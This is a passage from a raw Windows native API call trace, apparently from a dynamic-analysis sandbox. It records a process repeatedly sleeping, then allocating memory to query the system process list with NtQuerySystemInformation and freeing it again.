FreeType=0x8000) returned 0x0 [0256.380] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.387] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.396] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.403] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.413] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.420] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.427] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.434] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.442] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.452] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.465] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.481] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.488] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.495] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.498] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.498] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.510] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.519] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.529] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0256.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0256.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0256.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0256.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0256.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0256.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0256.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 